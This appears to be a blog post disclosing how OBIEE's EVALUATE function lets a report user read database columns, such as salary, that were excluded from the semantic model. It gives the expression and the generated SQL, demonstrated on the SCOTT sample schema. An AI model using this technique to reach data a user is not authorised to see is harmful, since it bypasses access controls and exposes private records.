Security risk involved in OBIEE 10g /11g or Stealing Information using OBIEE
With Evaluate Function we can able to view all back-end DB info. To demonstrate this, we use SCOTT table. Below we have modeled SCOTT, EMP and DEPT table. And from EMP table, the SAL & COMM is removed.
After modelling without 'SAL' & 'COMM' column. I am now trying the following query in my Analysis:
I have selected Employee Name & Job. Now in my next report, i am selecting Job like :
Evaluate('%1',EMP.JOB)
And the report looks like :
Now I am adding another column which would fetch the salary info:
Now the Result :
As you can see, even though we didn't bring in SAL column to the RPD, I can able to view the values. Now comparing it with SQL Developer result:
The Results are matching!!! The Query generated for the OBI Report:
WITH
SAWITH0 AS (select distinct replace(SAL||T10687.JOB , T10687.JOB , '') as c1,
T10687.JOB as c2,
T10687.JOB as c3,
T10687.ENAME as c4
from
EMP T10687),
SAWITH1 AS (select D1.c1 as c1,
D1.c2 as c2,
D1.c3 as c3,
D1.c4 as c4,
D1.c5 as c5
from
(select 0 as c1,
D1.c4 as c2,
D1.c3 as c3,
D1.c2 as c4,
D1.c1 as c5,
ROW_NUMBER() OVER (PARTITION BY D1.c3, D1.c4 ORDER BY D1.c3 ASC, D1.c4 ASC) as c6
from
SAWITH0 D1
) D1
where ( D1.c6 = 1 ) )
select D1.c1 as c1, D1.c2 as c2, D1.c3 as c3, D1.c4 as c4, D1.c5 as c5 from ( select distinct D1.c1 as c1,
D1.c2 as c2,
D1.c3 as c3,
D1.c4 as c4,
D1.c5 as c5
from
SAWITH1 D1
order by c1, c2, c3, c4, c5 ) D1 where rownum <= 40001
Overall, if we know the back end column its easy to
get the information evaluate function.
